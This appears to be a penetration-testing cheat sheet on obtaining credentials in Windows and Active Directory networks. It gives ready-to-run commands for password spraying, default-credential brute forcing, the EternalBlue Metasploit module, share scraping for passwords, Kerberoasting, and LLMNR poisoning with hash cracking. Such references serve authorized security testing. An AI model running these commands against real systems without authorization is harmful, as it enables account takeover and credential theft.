Getting Credentials

Password Spraying Description: Attempt a single password across multiple user accounts to avoid account lockout. Tools/Commands:

• CrackMapExec: crackmapexec smb <IP> -u users.txt -p "Password123"

• Hydra: hydra -L users.txt -p "Password123" smb://<IP>

• Metasploit: auxiliary/scanner/smb/smb_login

Default Passwords (Tomcat, Jenkins, etc.) Description: Check for default or weak credentials on services or applications. Tools/Commands:

• nmap --script http-default-accounts -p <port> <IP>

• hydra -l admin -P passwords.txt http-get://<IP>

• Online default password repositories (e.g., )

Missing Patches Description: Identify and exploit unpatched vulnerabilities in services or systems. Tools/Commands:

• Nessus/Qualys for vulnerability scanning.

• Metasploit: use exploit/windows/smb/ms17_010_eternalblue

• nmap --script vuln <IP>

Cleartext Passwords on File Shares Description: Look for files on shared folders containing plaintext credentials. Tools/Commands:

• PowerShell: Get-ChildItem \\<IP>\share -Recurse | Select-String -Pattern "password"

• SMBClient: smbclient //<IP>/<share> -U <username>

• CrackMapExec: crackmapexec smb <IP> -u <USER> -p <PASS> --shares

Kerberoasting Description: Request service tickets for SPNs and crack them offline to recover passwords. Tools/Commands:

• Impacket: GetUserSPNs.py -request -dc-ip <IP> <DOMAIN>/<USER>

• Rubeus: Rubeus.exe kerberoast

• John the Ripper: john --format=krb5tgs hash.txt

LLMNR and NetBIOS Poisoning Description: Exploit LLMNR/NetBIOS to capture and relay NTLMv2 hashes. Tools/Commands:

• Responder: responder -I <interface>

• Inveigh: Invoke-Inveigh

• Hashcat: hashcat -m 5600 hash.txt wordlist.txt